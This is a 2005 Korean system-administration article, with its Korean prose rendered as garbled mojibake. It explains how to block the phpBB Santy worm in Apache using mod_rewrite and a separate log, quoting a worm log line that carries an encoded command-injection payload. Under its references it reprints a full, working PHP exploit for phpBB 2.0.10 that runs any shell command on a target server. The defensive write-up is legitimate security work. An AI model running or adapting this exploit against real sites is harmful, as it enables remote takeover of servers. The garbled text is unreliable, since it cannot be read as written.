Ä¿ÇÇÇâÀÌ ³ª´Â *NIX
Ä¿ÇǴнº
½Ã½ºÅÛ/³×Æ®¿÷/º¸¾ÈÀ» ´Ù·ç´Â °÷
*
HanIRCÀÇ #coffeenix ¹æ
[
Àåºñ ¹× ȸ¼± ÈÄ¿ø
]
> Forum <
IT ÀÏÁ¤
N
e
w
!
ÀÚµ¿È ÇÁ·ÎÁ§Æ®
HOME
>
³×Æ®¿öÅ©(network)
>
À¥ ¼¹ö(web, httpd, apache)
µµ¿ò¸»
°Ë»ö :
»çÀÌÆ®
WHOIS
À¥¼¹ö Á¾·ù
WebDAV
(7, ±Û 1, ÀÚ·á 4)
À¥¼¹ö Æ©´×
(5, ±Û 4, ÀÚ·á 2)
À¥¼¹ö »ç¿ë Åë°è ÀÚ·á
(2, ÀÚ·á 1)
Apache SSL / mod_ssl
(4, ±Û 3, ÀÚ·á 2)
¾ÆÆÄÄ¡¿¡¼ phpBB¿ú Â÷´Ü ¹× º°µµ ·Î±× ÀúÀå
ÀÛ¼ºÀÏ : 2005/02/19 00:07
±Û¾´ÀÌ : ÁÁÀºÁøÈ£ (
http://coffeenix.net/
)
Á¶È¸¼ö : 9394
[
ÀÌÀüȸé
/
¼öÁ¤
] ºñ¹Ð¹øÈ£ :
Á¦ ¸ñ : ¾ÆÆÄÄ¡¿¡¼ phpBB¿ú Â÷´Ü ¹× º°µµ ·Î±× ÀúÀå
±Û¾´ÀÌ : ÁÁÀºÁøÈ£(truefeel,
http://coffeenix.net/
)
±Û¾´ÀÏ : 2005.2.16(¼ö)
phpBB 2.0.11 ÀÌÀü ¹öÀüÀÇ º¸¾È¹®Á¦¸¦ ÀÌ¿ëÇÑ phpBB Worm(Santy ¿ú µî)ÀÇ °ø°ÝÀÌ ¿©ÀüÈ÷
¸¹ÀÌ ½ÃµµµÇ°í ÀÖ´Ù. phpBB¸¦ ÃֽŠ¹öÀüÀ¸·Î ¾÷ÇÏ´Â °ÍÀº ´ç¿¬ÇÑ °ÍÀÌÁö¸¸ Áö¼ÓÀûÀÎ °ø°Ý
À¸·Î ½Ã½ºÅÛ ·Îµå¸¦ Àâ¾Æ¸Ô°í Â¥Áõ³ª´Â ·Î±×¸¦ ÇØ°áÇÒ ¹æ¹ýÀÌ ÇÊ¿äÇß´Ù.
1. phpBB ¿ú °ø°Ý ·Î±×
access log¿¡´Â ´ÙÀ½°ú °°Àº ÇüÅÂÀÇ ·Î±×°¡ ³²´Â´Ù. (ÇÑÁÙ·Î)
65.77.xxx.xx - - [30/Dec/2004:19:58:01 +0900] "GET /...°æ·Î.../viewtopic.php?p=1303&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)
%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)
%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)
%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
HTTP/1.0" 302 712 "-" "Mozilla/4.0"
highlight= º¯¼ö·Î ³Ñ¾î¿Â °ªÀ» phpBBÀÇ viewtopic.php¿¡¼ urldecode()ÇÔ¼ö¸¦ ÅëÇØ º¸¾È»óÀÇ
¹®Á¦¸¦ ¿¾îµÎ°í Àִµ¥ À̸¦ ¾Ç¿ëÇÑ °ÍÀÌ´Ù.
¿úÀÇ ´Ù¸¥ Ư¡Àº Agent°¡ "Mozilla/4.0"À̶ó´Â °ÍÀÌ´Ù. ´ÜÁö ÀÌ user agentÀÎ °æ¿ì¸¦ Â÷´Ü
¸é Á¤»óÀûÀÎ »ç¿ëÀÚÀÇ Á¢¼ÓÀ» Â÷´ÜÇÏ´Â °æ¿ìµµ »ý±æ ¼ö ÀÖÀ¸¹Ç·Î ¿©±â¼´Â URLÀ» ÅëÇÑ ¹æ¹ýÀ»
»ç¿ëÇÒ °ÍÀÌ´Ù.
2. ¿ú Â÷´Ü°ú ·Î±×´Â º°µµ ÀúÀå
¿úµµ Â÷´ÜÇÏ¸é¼ µ¿½Ã¿¡ À¥·Î±×´Â º°µµ·Î ÀúÀåÇÏ´Â httpd.conf ¾ÆÆÄÄ¡ ¼³Á¤À» ¾Ë¾Æº¸ÀÚ.
RewriteEngine On
RewriteCond %{QUERY_STRING} ^[a-z]{1}=(.*)highlight=\%2527\%252E
RewriteRule ^.*$
http://127.0.0.1/
[R,L,E=phpbb:1]
CustomLog logs/phpbb_worm_log common env=phpbb
¾ÆÆÄÄ¡¿¡¼´Â URL Rewriting ¼³Á¤À» ÅëÇØ Æ¯Á¤ URL·Î ¿äûµÈ °ÍÀ» ³»ºÎÀÇ ´Ù¸¥ ÆäÀÌÁö·Î
³Ñ±æ ¼öµµ ÀÖ°í ÀüÇô ´Ù¸¥ »çÀÌÆ®ÀÇ ÆäÀÌÁö·Î º¸³¾ ¼öµµ ÀÖ´Ù. ¶ÇÇÑ Á¶°Ç¿¡ ¸Â´Â URLÀ̸é
À̸¦ ¾ÆÆÄÄ¡ ³»ÀÇ º¯¼ö°ªÀ¸·Î ÁöÁ¤µµ °¡´ÉÇÏ´Ù.
¾ÆÆÄÄ¡ÀÇ Rewriting rule¿¡ ´ëÇÑ ÀÚ¼¼ÇÑ ±ÛÀº Apache ȨÆäÀÌÁöÀÇ "URL Rewriting Guide"
¸¦ Àо±â ¹Ù¶ó°í, ¼³Á¤¿¡ ´ëÇØ ÇÑÁÙ¾¿ ¾Ë¾Æº¸±â·Î ÇÏÀÚ.
ù¹ø°ÁÙÀº URL rewritingÀÇ ½ÃÀÛÀ» ¾Ë¸°´Ù.
µÎ¹ø°ÁÙÀº Á¶°Ç¹®ÀÌ´Ù. URI(Äõ¸®)Áß¿¡ À§¿Í °°Àº URLÀÌ ÇüÅÂÀÎ °æ¿ìÀÎÁö¸¦ ºñ±³ÇϰԵȴÙ.
Áï, ·Î±×ÀÇ Ã¹ºÎºÐÀÎ ´ÙÀ½°ú °°Àº ºÎºÐ¿¡ ÇØ´çµÈ´Ù.
p=1303&highlight=%2527%252Esystem(...
t=1303&highlight=%2527%252Esystem(...
¼¼¹ø°ÁÙÀº Á¶°ÇÀÌ ¸Â´Â °æ¿ì¿¡ ¾î¶»°Ô ó¸®ÇÒ °ÍÀÎÁö¸¦ Á¤ÀÇÇÑ °ÍÀε¥,
¿úÀ¸·Î ÆÇ´ÜµÇ¸é ¿äûÀ»
http://127.0.0.1/
À¸·Î ³Ñ°Ü¹ö¸°´Ù. Áï ¿ú Àڽſ¡°Ô ¿äûÀ»
³Ñ±â°Ô µÇ´Â °ÍÀÌ´Ù. ¿©±â¼ ¶Ç Çϳª Áß¿äÇÑ ºÎºÐÀÌ 'E=phpbb:1' ÀÌ´Ù.
ȯ°æº¯¼ö phpbb¿¡ 1À̶ó´Â °ªÀ» ³ÖÀ¸¶ó´Â °ÍÀÌ´Ù. ÀÌ °ÍÀº ·Î±×¸¦ º°µµ·Î ÀúÀåÇϱâ À§ÇÑ
¾È³»ÀÚ ¿ªÇÒÀ» ÇÏ°Ô µÈ´Ù.
³×¹ø°ÁÙÀº ȯ°æº¯¼ö phpbb·Î Á¤ÀÇµÈ ¿äûÀº logs/phpbb_worm_log ¿¡ ·Î±×¸¦ ³²±â¶ó´Â °ÍÀÌ´Ù.
ÀÚ~ ÀÌÁ¦ Â¥Áõ³ª´Â Àú ¿úÀ» Çѹ濡 ³¯·Á¹ö¸®¼¼¿ä.
3. Âü°í ÀÚ·á
* Apache 1.3 URL Rewriting Guide
http://httpd.apache.org/docs/misc/rewriteguide.html
* phpBB Worm Â÷´Ü¿¡ ´ëÇØ (±Û Raymond Dijkxhoorn)
http://www.securityfocus.com/archive/1/385103
* phpBBÀÇ highlight º¯¼öÀÇ º¸¾È¹®Á¦¿¡ ´ëÇØ
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
* phpBB Remote Command Execution (Viewtopic.php Highlight)
http://www.securiteam.com/unixfocus/6J00O15BPS.html
Exploit Code :
#!/usr/bin/php -q
/*
# phpBB 2.0.10 execute command by pokleyzz
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (
http://www.howdark.com
) (1st October 2004)
#
# Requirement:
#
# PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/
if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}
if ($argv[2]){
$url = $argv[1];
$command = $argv[2];
}
else {
echo "Usage: ".$argv[0]."
[topic id] [proxy]\n\n";
echo "\tURL\t URL to phpnBB site (ex:
http://127.0.0.1/html
)\n";
echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
echo "\ttopic_id\t topic id\n";
echo "\tproxy\t optional proxy url (ex:
http://10.10.10.10:8080
)\n";
exit;
}
if ($argv[3])
$topic = $argv[3];
else
$topic = 1;
if ($argv[4])
$proxy = $argv[4];
$cmd = str2chr($command);
$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;
function str2chr($str){
for($i = 0;$i < strlen($str);$i++){
$chr .= "chr(".ord($str{$i}).")";
if ($i != strlen($str) -1)
$chr .= "%252e";
}
return $chr;
}
?>
* Using the [E=VAR:VAL] flag to pass a variable to CGI
http://www.webmasterworld.com/forum92/2631.htm
Ä¿ÇǴнº Ä«Æä ÃÖ±Ù ±Û
[04/25]
±¹°¡
[04/24]
º¸Çè
[04/22]
Re: OpenSSL Ãë¾àÁ¡ Á¤¸®, Logjam(·Î±×Àë)¿¡¼ Heartbleed±îÁö
[04/21]
LET¡¯S START WITH ON
[04/21]
º¸Çè
[04/20]
Á¦ÁÖ
[04/20]
±¹³»
[04/19]
Á¦ÁÖ
[04/18]
??? ?????
[04/17]
???? onion ?????? -
[04/11]
±¹°¡
[04/10]
Stride Into Dream:
[03/20]
Re: ¿Â¶óÀΰÔÀÓÀÇ Á¾ÁÖ±¹ ´ëÇѹα¹
[10/20]
Cross Compiler ±ò
[07/14]
SSL ¬¡¬°
N
e
w
! ÃÖ±Ù¿¡ µî·ÏÇÑ ÆäÀÌÁö
KiCad EDA Suite project (Free/Libre/Open-Source EDA Suite) (CAD)
¿ÀÇÂij½ºÄÉÀ̵å ijµå (OpenCASCADE CAD)
QCad for Windows --- GNU GPL (Free Software)
The Hello World Collection
IPMI¸¦ È°¿ëÇÑ ¸®´ª½º ¼¹ö°ü¸®
DNS ¼³Á¤ °Ë»ç
nagiosgraph ¼³Ä¡ ¹æ¹ý
Slony-I ¼³Ä¡ ¹æ¹ý (postgresql replication tool)
Qmail±â¹ÝÀÇ Anti spam ½Ã½ºÅÛ ±¸ÃàÇϱâ
clusterssh
[ ÇÔ²²ÇÏ´Â »çÀÌÆ® ]
¿î¿µÁø :
ÁÁÀºÁøÈ£(truefeel)
, ¾ß¼ö(yasu), ¹ü³ÃÀÌ, sCag
2003³â 8¿ù 4ÀÏ~